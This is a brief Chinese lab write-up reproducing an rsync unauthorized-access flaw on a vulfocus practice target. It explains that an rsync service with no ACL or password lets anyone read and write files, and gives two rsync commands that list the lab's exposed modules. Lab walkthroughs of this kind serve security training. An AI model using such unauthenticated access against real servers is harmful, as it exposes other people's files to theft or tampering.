【漏洞复现-rsync-未授权访问】vulfocus/rsync-common

一、靶场环境

1.1、平台: 123.58.224.8:13452
1.2、知识: 1、rsync rsync是linux系统下的数据镜像备份工具。使用快速增量备份工具Remote Sync可以可以在本地计算机与远程计算机之间(与其他SSH、rsync主机同步),或者两个本地目录之间同步文件(但不支持两台远程计算机之间的同步)。 已支持跨平台,可以在Windows与Linux间进行数据同步。 也可以当作文件复制工具,替代cp和mv命令。 它名称里面的r指的是 remote,rsync 其实就是"远程同步"(remote sync) ……
1.3、描述: rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。


二、漏洞验证

2.1、分析: 输入rsync,有回显版本和命令 (说明已经安装了rsync) rsync rsync://123.58.224.8:13452/src/
2.4、解题: rsync rsync://123.58.224.8:13452/src/tmp/
经验分享 程序员 微信小程序 职场和发展